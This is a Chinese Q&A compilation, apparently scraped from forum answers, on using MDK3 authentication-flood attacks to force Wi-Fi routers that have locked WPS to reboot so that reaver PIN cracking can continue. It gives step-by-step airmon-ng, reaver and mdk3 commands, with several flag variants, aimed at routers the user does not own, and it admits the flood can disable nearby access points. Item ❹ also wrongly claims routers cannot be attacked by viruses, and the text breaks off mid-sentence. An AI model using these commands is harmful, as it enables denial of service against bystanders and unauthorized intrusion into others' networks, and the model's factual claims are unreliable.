❶ MDK3攻擊對已經出現300秒提示的路由是否無效
看了你給的鏈接,不過,我覺得MDK3並不是炒作,它有他的工作原理,我在一樓的就已經說了,試過幾個路由,並已經成功了,現在只是在討論如何應付300秒防pin的路由而已。
❷ 關於路由器pin死的解決方案(mdk3驗證模式攻擊!)的疑問
pin死了保存窗口不變,打開超級終端,輸出reaver -i mon0 -b MAC地址 -a -s- -vv 回車
❸ 如何在kali中安裝mdk3
建議到kalilinux官網下載www.kali.org。下載完成之後,如果你需要虛擬機則在電腦上面已經安裝好的虛擬機軟體裡面新建虛擬機配置鏡像文件即可。
❹ 如果路由器被MDK3 攻擊 ,那麼路由器能自動恢復嗎
路由器不會被病毒攻擊,但是可能會遭到黑客入侵,導致默認設置被篡改。
病毒是一種直接式的操作程序,只能修改計算機設備的設置,不可能影響到路由器。而黑客可能會破解路由器連接密碼,並嘗試連接到後台,嘗試修改默認設置,起到破壞作用。
因此,路由器不會被病毒攻擊,只能被人為修改。如果路由器出現了默認設置被篡改的現象,請檢查是否出現了黑客操作的痕跡。
❺ 誰說mdk3 攻擊沒用的
對老設備都管用的。新出的路由估計不太好使
❻ 怎樣搞死mdk3對付不了的路由
mdk3攻擊對一部分路由器沒有一點效果,如果pin死就不能讓東家重啟路由,急需要研究一種可以把這一部分路由攻擊死的工具!
❼ 路由器pin死怎麼辦
重啟之後關掉wps。
首先檢測網卡:
ifconfig -a
然後模擬埠:
airmon-ng start wlan0
接下來用:
airomp-ng mon0
掃描ap找到你pin死的路由器mac
用mdk3 做身份驗證攻擊
mdk3 mon0 a -a mac(被pin死的路由器的mac)
身份驗證攻擊效果說明:
此攻擊是針對無線AP的洪水攻擊,又叫做身份驗證攻擊。其原理就是向AP發動大量的虛假的鏈接請求,這種請求數量一旦超 過了無線AP所能承受的范圍,AP就會自動斷開現有鏈接,使合法用戶無法使用無線網路。迫使路由主人重啟路由器。
說明:
此命令功能強大,使用錯誤會造成所有ap不能使用,請指定mac地址,然後使用,其餘命令不要亂試。你要使用此命令的其他參數,請詳細閱讀此命令參數詳解。
經測試此功能異常強大,但要慎用,不但會使被攻擊的AP死機還會影響到其他可視范圍內的AP。搞不好會把其他已經PJ的AP都搞癱瘓。
廢話少說首先進入CDlinux,打開水滴或者打氣筒搜索pin死的MAC地址(直接打開水滴或者3070驅動搜索無線MAC地址
然後點擊左下角CDlnux圖標,依次打開 無線安全--------mdk3-v6
進入mdk3後輸入命令mdk3 mon0 a -a 40:16:9F:**:2C:B2(40:16:9F:**:2C:B2為你pin死的路由的MAC,注意空格和大小寫)
回車後進入攻擊模式,時間不要太長,最多半分鍾就可以關閉對話框然後重新掃描網路看pin死的路由是不是已經不在了。等待主人重啟吧
❽ 請教mdk3 攻擊路由器問題
以下幾種攻擊模式,可以一個個試,看那個模式有用:mdk3 mon0 a -p 40:16:9F:**:2C:B2(40:16:9F:**:2C:B2為你pin死的路由的MAC,注意空格和大小寫)mdk3 mon0 a -d 40:16:9F:**:2C:B2(40:16:9F:**:2C:B2為你pin死的路由的MAC,注意空格和大小寫)mdk3 mon0 a -f 40:16:9F:**:2C:B2(40:16:9F:**:2C:B2為你pin死的路由的MAC,注意空格和大小寫)mdk3 mon0 a -g 40:16:9F:**:2C:B2(40:16:9F:**:2C:B2為你pin死的路由的MAC,注意空格和大小寫)
❾ mdk3 攻擊究竟有沒有作用
經過長期使用發現其實mdk3對部分路由有用,有部分路由是防dos攻擊的,完全起不